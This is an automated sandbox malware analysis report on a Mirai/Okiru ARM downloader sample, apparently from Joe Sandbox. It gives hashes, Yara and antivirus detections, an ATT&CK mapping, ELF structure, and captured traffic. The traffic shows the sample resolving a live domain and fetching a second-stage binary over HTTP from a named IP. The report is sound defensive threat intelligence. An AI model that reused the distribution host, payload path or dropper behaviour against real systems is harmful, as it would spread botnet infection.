Linux Analysis Report
dlr.arm6.elf

Overview

General Information

Sample name:dlr.arm6.elf
Analysis ID:1582462
MD5:f36b2fdb85fd0ac58c92bd70b5dd65d2
SHA1:698b1722837ba0fed2a50ca4bbb223cd138eb90d
SHA256:7b95bc95d544c96ca8eb67fc12bd56c73be5a3b7019113a796b6e55ef07c70dc
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1582462
Start date and time:2024-12-30 17:28:09 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 30s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm6.elf
Detection:MAL
Classification:mal88.troj.linELF@0/1@1/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: dlr.arm6.elf
Command:/tmp/dlr.arm6.elf
PID:5488
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
byte
bro
Standard Error:
  • system is lnxubuntu20
  • dlr.arm6.elf (PID: 5488, Parent: 5414, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm6.elf
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums", many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source: /tmp/byte, Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Author: Joe Security
Source: /tmp/byte, Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Author: Joe Security
Source: /tmp/byte, Rule: JoeSecurity_Mirai_5, Description: Yara detected Mirai, Author: Joe Security
Source: /tmp/byte, Rule: Mirai_Botnet_Malware, Description: Detects Mirai Botnet Malware, Author: Florian Roth, Strings:
  • 0x134f8:$x1: POST /cdn-cgi/
  • 0x14b2c:$s1: LCOGQGPTGP
Source: /tmp/byte, Rule: MAL_ELF_LNX_Mirai_Oct10_2, Description: Detects ELF malware Mirai related, Author: Florian Roth, Strings:
  • 0x134f8:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
No Suricata rule has matched


        AV Detection

        Source: /tmp/byte, Avira: detection malicious, Label: LINUX/Mirai.bonb
        Source: dlr.arm6.elf, ReversingLabs: Detection: 36%
        Source: global traffic, HTTP traffic detected: GET /bins/byte.arm6 HTTP/1.0 Data Raw: 00 00 Data Ascii:
        Source: /tmp/dlr.arm6.elf (PID: 5488), Reads hosts file: /etc/hosts
        Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic, DNS traffic detected: DNS query: vbtgsze.r-e.kr

        System Summary

        Source: /tmp/byte, type: DROPPED, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
        Source: /tmp/byte, type: DROPPED, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
        Source: ELF static info symbol of initial sample, .symtab present: no
        Source: /tmp/byte, type: DROPPED, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: /tmp/byte, type: DROPPED, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
        Source: classification engine, Classification label: mal88.troj.linELF@0/1@1/0
        Source: /tmp/dlr.arm6.elf (PID: 5488), File written: /tmp/byte
        Source: /tmp/dlr.arm6.elf (PID: 5488), Queries kernel information via 'uname'
        Source: dlr.arm6.elf, 5488.1.00007ffe7fb8d000.00007ffe7fbae000.rw-.sdmp, Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm6.elf
        Source: dlr.arm6.elf, 5488.1.0000561bf493b000.0000561bf4a8a000.rw-.sdmp, Binary or memory string: /etc/qemu-binfmt/arm
        Source: dlr.arm6.elf, 5488.1.0000561bf493b000.0000561bf4a8a000.rw-.sdmp, Binary or memory string: V!/etc/qemu-binfmt/arm
        Source: dlr.arm6.elf, 5488.1.00007ffe7fb8d000.00007ffe7fbae000.rw-.sdmp, Binary or memory string: /usr/bin/qemu-arm

        Stealing of Sensitive Information

        Source: Yara match, File source: /tmp/byte, type: DROPPED
        Source: Yara match, File source: /tmp/byte, type: DROPPED

        Remote Access Functionality

        Source: Yara match, File source: /tmp/byte, type: DROPPED
        Source: Yara match, File source: /tmp/byte, type: DROPPED
        Columns: Reconnaissance; Resource Development; Initial Access; Execution; Persistence; Privilege Escalation; Defense Evasion; Credential Access; Discovery; Lateral Movement; Collection; Command and Control; Exfiltration; Impact
        Row 1: Gather Victim Identity Information; 1 Scripting; Valid Accounts; Windows Management Instrumentation; 1 Scripting; Path Interception; Direct Volume Access; OS Credential Dumping; 11 Security Software Discovery; Remote Services; Data from Local System; 2 Non-Application Layer Protocol; Exfiltration Over Other Network Medium; Abuse Accessibility Features
        Row 2: Credentials; Domains; Default Accounts; Scheduled Task/Job; Boot or Logon Initialization Scripts; Boot or Logon Initialization Scripts; Rootkit; LSASS Memory; 1 File and Directory Discovery; Remote Desktop Protocol; Data from Removable Media; 2 Application Layer Protocol; Exfiltration Over Bluetooth; Network Denial of Service
        Row 3: Email Addresses; DNS Server; Domain Accounts; At; Logon Script (Windows); Logon Script (Windows); Obfuscated Files or Information; Security Account Manager; Query Registry; SMB/Windows Admin Shares; Data from Network Shared Drive; 1 Ingress Tool Transfer; Automated Exfiltration; Data Encrypted for Impact
        No configs have been found
        Source: dlr.arm6.elf, Detection: 37%, Scanner: ReversingLabs, Label: Linux.Backdoor.Mirai
        Source: /tmp/byte, Detection: 100%, Scanner: Avira, Label: LINUX/Mirai.bonb
        Source: /tmp/byte, Detection: 78%, Scanner: ReversingLabs, Label: Linux.Backdoor.Bushido
        No Antivirus matches
        No Antivirus matches
        Name: vbtgsze.r-e.kr, IP: 193.143.1.66, Active: true, Malicious: false, Reputation: high
        IP: 193.143.1.66, Domain: vbtgsze.r-e.kr, Country: unknown, ASN: 57271, ASN Name: BITWEB-ASRU, Malicious: false
          No context
          No context
          No context
          Process:/tmp/dlr.arm6.elf
          File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
          Category:dropped
          Size (bytes):94544
          Entropy (8bit):6.238533589587562
          Encrypted:false
          SSDEEP:1536:lHn8+RM4cr8vFgMqZANJKftzdulowN10f9VVaSIQsQWMIiLO42z6T5zYBl61d6K9:u8M43sZnf9duZmf9VVaSLOhz6T92419
          MD5:8F15EF708F3B4B0C670F05D4C2A84C47
          SHA1:4F7B521D38BD3AB5F9EEB1658AA65FC003CABF67
          SHA-256:17E9FA02A2EFCFE6326769A80CB2458BACC5F28F8CB0A68E305AF3F5C4904C45
          SHA-512:17D8C6ECE8828680D967857AA9B044B8831548D77DA509434A3F200677549419B5405A82A4554FA16E900234C2524B876D148C10EEB45345598A96466FEDDDF1
          Malicious:true
          Yara Hits:
          • Rule: JoeSecurity_Okiru, Description: Yara detected Okiru, Source: /tmp/byte, Author: Joe Security
          • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
          • Rule: JoeSecurity_Mirai_5, Description: Yara detected Mirai, Source: /tmp/byte, Author: Joe Security
          • Rule: Mirai_Botnet_Malware, Description: Detects Mirai Botnet Malware, Source: /tmp/byte, Author: Florian Roth
          • Rule: MAL_ELF_LNX_Mirai_Oct10_2, Description: Detects ELF malware Mirai related, Source: /tmp/byte, Author: Florian Roth
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 78%
          Reputation:low
          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
          Entropy (8bit):6.00003830342405
          TrID:
          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
          File name:dlr.arm6.elf
          File size:50'092 bytes
          MD5:f36b2fdb85fd0ac58c92bd70b5dd65d2
          SHA1:698b1722837ba0fed2a50ca4bbb223cd138eb90d
          SHA256:7b95bc95d544c96ca8eb67fc12bd56c73be5a3b7019113a796b6e55ef07c70dc
          SHA512:0ea670209fbe1ca3cab5350960c2c0582f646814c0efde0a0111571985cee307be9370905d137d3ac62303f2fdeb5e9300e4e4e3dbdd6097c9306217bb32231c
          SSDEEP:768:JczdSk4rkssH9dpZAzJiPWvHmWrkimnSawha7bl0iKpWJt5UYSI:Jkdf4rknzWelimn0a7R0iaa5UYS
          TLSH:B6231896F9819B11D5C1117AFE4E124E7323077CE3DE73265E24AB34678797B0E3A80A

          ELF header

          Class:ELF32
          Data:2's complement, little endian
          Version:1 (current)
          Machine:ARM
          Version Number:0x1
          Type:EXEC (Executable file)
          OS/ABI:UNIX - System V
          ABI Version:0
          Entry Point Address:0x83c8
          Flags:0x4000002
          ELF Header Size:52
          Program Header Offset:52
          Program Header Size:32
          Number of Program Headers:3
          Section Header Offset:49772
          Section Header Size:40
          Number of Section Headers:8
          Header String Table Index:7
          Name             Type            Address  Offset  Size    EntSize  Flags  Flags Description  Link  Info  Align
                           NULL            0x0      0x0     0x0     0x0      0x0                       0     0     0
          .text            PROGBITS        0x80a0   0xa0    0xa874  0x0      0x6    AX                 0     0     16
          .rodata          PROGBITS        0x12918  0xa918  0x13f8  0x0      0x2    A                  0     0     8
          .got             PROGBITS        0x1c000  0xc000  0x78    0x4      0x3    WA                 0     0     4
          .data            PROGBITS        0x1c078  0xc078  0x1a8   0x0      0x3    WA                 0     0     4
          .bss             NOBITS          0x1c220  0xc220  0x260c  0x0      0x3    WA                 0     0     4
          .ARM.attributes  ARM_ATTRIBUTES  0x0      0xc220  0x10    0x0      0x0                       0     0     1
          .shstrtab        STRTAB          0x0      0xc230  0x39    0x0      0x0                       0     0     1

          Type       Offset  Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags  Flags Description  Align   Prog Interpreter  Section Mappings
          LOAD       0x0     0x8000           0x8000            0xbd10     0xbd10       6.0929   0x5    R E                0x8000                    .text .rodata
          LOAD       0xc000  0x1c000          0x1c000           0x220      0x282c       2.0927   0x6    RW                 0x8000                    .got .data .bss
          GNU_STACK  0x0     0x0              0x0               0x0        0x0          0.0000   0x7    RWE                0x4
          Timestamp: Dec 30, 2024 17:28:57.800127983 CET, Source Port: 54489, Dest Port: 53, Source IP: 192.168.2.14, Dest IP: 1.1.1.1
          Timestamp: Dec 30, 2024 17:28:58.416805029 CET, Source Port: 53, Dest Port: 54489, Source IP: 1.1.1.1, Dest IP: 192.168.2.14
          Timestamp: Dec 30, 2024 17:28:57.800127983 CET, Source IP: 192.168.2.14, Dest IP: 1.1.1.1, Trans ID: 0x8011, OP Code: Standard query (0), Name: vbtgsze.r-e.kr, Type: A (IP address), Class: IN (0x0001), DNS over HTTPS: false
          Timestamp: Dec 30, 2024 17:28:58.416805029 CET, Source IP: 1.1.1.1, Dest IP: 192.168.2.14, Trans ID: 0x8011, Reply Code: No error (0), Name: vbtgsze.r-e.kr, Address: 193.143.1.66, Type: A (IP address), Class: IN (0x0001), DNS over HTTPS: false
          Session ID: 0, Source IP: 192.168.2.14, Source Port: 42018, Destination IP: 193.143.1.66, Destination Port: 80
          Timestamp: Dec 30, 2024 17:28:58.424959898 CET, Bytes transferred: 46, Direction: OUT, Data:
          GET /bins/byte.arm6 HTTP/1.0
          Data Raw: 00 00
          Data Ascii:
          Timestamp: Dec 30, 2024 17:28:59.107444048 CET, Bytes transferred: 1236, Direction: IN, Data:
          HTTP/1.0 200 OK
          Accept-Ranges: bytes
          Content-Length: 94544
          Content-Type: application/octet-stream
          Last-Modified: Mon, 30 Dec 2024 12:54:41 GMT
          Date: Mon, 30 Dec 2024 16:28:59 GMT


          System Behavior

          Start time (UTC):16:28:57
          Start date (UTC):30/12/2024
          Path:/tmp/dlr.arm6.elf
          Arguments:/tmp/dlr.arm6.elf
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1